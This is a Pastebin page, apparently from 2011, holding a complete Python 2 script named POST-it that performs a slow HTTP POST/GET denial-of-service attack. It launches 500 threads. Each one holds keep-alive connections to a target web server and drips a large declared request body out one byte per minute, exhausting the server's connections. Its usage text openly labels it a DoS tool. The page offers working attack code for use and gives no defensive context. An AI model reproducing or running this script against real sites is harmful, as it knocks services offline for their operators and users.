Advertisement
infodox

POST-It.py HTTP POST DoS

Oct 25th, 2011
989
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.74 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. import sys
  4. import socket
  5. import time
  6. import getopt
  7. import re
  8. from threading import Thread
  9.  
  10. class MyThread(Thread,):
  11.     def __init__(self,SITE, DOS_TYPE):
  12.         Thread.__init__(self)
  13.         self.method = DOS_TYPE
  14.         self.site = SITE
  15.         self.kill_received = False
  16.     def run(self):
  17.         while not self.kill_received:
  18.             server = socket.gethostbyname(self.site)
  19.             post = 'x' * 6000
  20.             file = 'index.php'
  21.  
  22.             request = '%s /%s HTTP/1.1\r\n' %(self.method.upper(),file)
  23.             request += 'Host: %s\r\n' % (self.site)
  24.             request += 'User-Agent: Mozilla/5.0 (Windows; U;Windows NT 6.1; en-US; rv:1.9.2.12) Gecko/20101026Firefox/3.6.12\r\n'
  25.             request += 'Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n'
  26.             request += 'Accept-Language: en-us,en;q=0.5\r\n'
  27.             request += 'Accept-Encoding: gzip,deflate\r\n'
  28.             request += 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n'
  29.             request += 'Keep-Alive: 900\r\n'
  30.             request += 'Connection: keep-alive\r\n'
  31.             request += 'Content-Type: application/x-www-form-urlencoded\r\n'
  32.             request += 'Content-length: %s\r\n\r\n' % (len(post))
  33.  
  34.             newrequest = '%s\r\n' % (post)
  35.             newrequest += '\r\n'
  36.  
  37.             s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  38.  
  39.             try:
  40.                 s.connect((server, 80))
  41.                 s.send(request)
  42.  
  43.                 for c in newrequest:
  44.                     sys.stdout.write( s.send(c).__str__() )
  45.                     time.sleep(60)
  46.                 s.close()
  47.                 #s.recv(50000)
  48.             except:
  49.                 print "Is It Dead Yet?"
  50.  
  51. def da_delegator(SITE,DOS_TYPE):
  52.     thread_count = 500
  53.     print '=' * 60
  54.     print 'POST-it v1.1.0'.center(60,'-')
  55.     print '=' * 60
  56.     threads = []
  57.     for num in range(thread_count):
  58.         thr1=MyThread(SITE,DOS_TYPE)
  59.         print 'start - %s' % thr1
  60.         thr1.start()
  61.         threads.append(thr1)
  62.         #thr1.join()
  63.  
  64.     while len(threads) > 0:
  65.             try:
  66.                 # Join all threads using a timeout so it doesn't block
  67.                 # Filter out threads which have been joined or are None
  68.                 threads = [t.join(1) for t in threads if t is not
  69. None and t.isAlive()]
  70.             except KeyboardInterrupt:
  71.                 print "Ctrl-c received! Sending kill to threads... Just Kill The Terminal" # Need to fix this!!!
  72.                 for t in threads:
  73.                     t.kill_received = True
  74.                     sys.exit(2)
  75.  
  76. def main(argv):
  77.     def usage():
  78.         print '=' * 60
  79.         print 'POST-it v1.1.0'.center(60,'-')
  80.         print '=' * 60
  81.         print 'For get DOS - USAGE: postit.py -t get http://example.com'
  82.         print 'For post DOS - USAGE: postit.py -t post http://example.com'
  83.         sys.exit(2)
  84.     if not argv:
  85.         usage()
  86.     try:
  87.         opts, args = getopt.getopt(sys.argv[1:], "t:h", ["help",
  88. "type"])
  89.     except getopt.GetoptError, err:
  90.         print str(err)
  91.         sys.exit(2)
  92.     output = None
  93.     verbose = False
  94.     SITE = re.sub(r'http://', '', str(sys.argv[-1:][0]))
  95.  
  96.     for o, a in opts:
  97.         if o == "-v":
  98.             verbose = True
  99.         elif o in ("-t", "--type"):
  100.             if a.lower() == 'post':
  101.                 DOS_TYPE = 'POST'
  102.                 da_delegator(SITE,DOS_TYPE)
  103.             elif a.lower() =='get':
  104.                 DOS_TYPE = 'get'
  105.                 da_delegator(SITE,DOS_TYPE)
  106.         elif o in ("-h", "--help"):
  107.             usage()
  108.             sys.exit()
  109.         else:
  110.             assert False, "unhandled option"
  111.  
  112. if __name__=="__main__":
  113.     main(sys.argv[1:])
  114.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement